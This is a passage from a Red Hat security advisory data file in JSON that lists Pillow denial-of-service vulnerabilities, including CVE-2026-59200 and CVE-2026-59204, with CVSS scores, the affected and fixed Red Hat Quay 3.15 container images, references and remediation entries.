"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of Service via out-of-bounds write in image processing"
},
{
"cve": "CVE-2026-59200",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-07-14T17:02:45.929986+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500060"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit a vulnerability in the PdfParser.PdfStream.decode() function when processing a crafted FlateDecode PDF stream. By providing a specially designed PDF file, the attacker could cause the application to exhaust available memory, leading to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of service via crafted PDF stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The impact is limited to denial of service via memory exhaustion. A small crafted PDF input can force unbounded decompression, but this does not lead to code execution or information disclosure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59200"
},
{
"category": "external",
"summary": "RHBZ#2500060",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500060"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59200",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59200"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59200",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59200"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f7a31ea75e460e108c37126da1f47812f21f6b09",
"url": "https://github.com/python-pillow/Pillow/commit/f7a31ea75e460e108c37126da1f47812f21f6b09"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9718",
"url": "https://github.com/python-pillow/Pillow/pull/9718"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-jjj6-mw9f-p565",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-jjj6-mw9f-p565"
}
],
"release_date": "2026-07-14T16:09:05.091000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of service via crafted PDF stream"
},
{
"cve": "CVE-2026-59204",
"cwe": {
"id": "CWE-131",
"name": "Incorrect Calculation of Buffer Size"
},
"discovery_date": "2026-07-14T16:02:11.802781+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500022"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted JPEG2000 image file. Due to incorrect calculation of memory requirements for image tiles, processing this file can lead to excessive memory consumption, resulting in a denial of service (DoS) through out-of-memory failures.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via crafted JPEG2000 image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The impact is limited to denial of service via excessive memory allocation. A crafted JPEG2000 file can trigger out-of-memory failures, but this does not lead to code execution or information disclosure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
